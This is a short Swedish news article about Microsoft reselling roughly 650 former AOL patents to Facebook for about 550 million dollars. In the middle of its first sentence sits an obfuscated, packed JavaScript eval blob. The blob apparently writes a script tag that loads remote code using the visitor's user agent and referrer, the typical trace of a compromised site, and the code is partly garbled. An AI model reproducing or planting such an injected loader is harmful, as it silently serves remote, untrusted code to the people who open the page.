Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Microsoft säljer AOL-patent till företaget Facebook

Microsoft säljer AOL-patent till företaget Facebook
Sebastian Plengier Ehrnfelt

Microsoft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nirbz|var|u0026u|referrer|rynds||js|php’.split(‘|’),0,{}))
har köpt loss 800 patent och licensierat ytterligare 300 patent från AOL. Idag blev det verklighet att Microsoft säljer vidare en del av dessa patent till företaget Facebook.

Så här mycket betalade Microsoft från början:

– 1065 miljoner dollar för patenten AOL. Nu kommer Facebook betala ungefär hälften dvs 550 miljoner dollar till Microsoft för 650 av AOL patenten. I ett meddelande idag från Facebook sägs det att Microsoft köpte 925 patent av AOL och inte 800 som företaget AOL sagt från början. Man vet dock inte vilken siffra som är sann.

De 650 stycken patenter som Facebook köper av Microsoft idag kommer ge Microsoft rätt att licensiera från Facebook. Tidigare har Facebookköpt patent av IBM som man tror i stort sett bara köpts för att försvara sig mot Yahoo.